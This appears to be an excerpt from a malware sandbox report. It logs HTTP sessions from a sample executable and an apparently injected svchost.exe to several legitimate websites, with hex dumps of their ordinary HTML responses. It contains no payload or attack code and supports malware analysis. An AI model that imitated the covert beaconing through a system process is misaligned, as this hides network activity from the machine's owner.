                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC497INData Raw: 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 32 35 32 35 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 64 61 74 61 66 6f 72 6d 2d 6f 76 65 72 76 69 65 77 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: ass="menu-item-text"><span class="menu-text">Home</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-52525"><a href='https://dataform.co.uk/dataform-overview/' data-level='1'><span class="menu-item-text"><
                                                                                                                                                                                                                                                                        2023-03-10 06:56:15 UTC507INData Raw: 61 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d
                                                                                                                                                                                                                                                                        Data Ascii: ace(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7=


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        90192.168.2.65738391.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1373OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1393INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1393INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1442INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1458INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1474INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        91192.168.2.65739391.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1374OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1377INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1377INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1409INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1425INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1441INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        92192.168.2.657451185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1374OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1374INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1375INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        93192.168.2.657443185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1374OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1375INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1376INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        94192.168.2.657786188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1474OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1474INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:20 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WW10siKKNSfeez2sZOWup1EZgiawhKWIOI02mw%2FEP%2B4H5WnS%2Fr9Nzt7rybeCWfR4qHqkjMLCGL2Iyc6YLBT2P%2Bro5Vc%2Fz4sX0wRPONZNtgxILrkX48cxSrf5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a842ce498fee-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1475INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1475INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        95192.168.2.65787883.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1474OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1598INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=93
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:22 GMT
                                                                                                                                                                                                                                                                        Connection: close
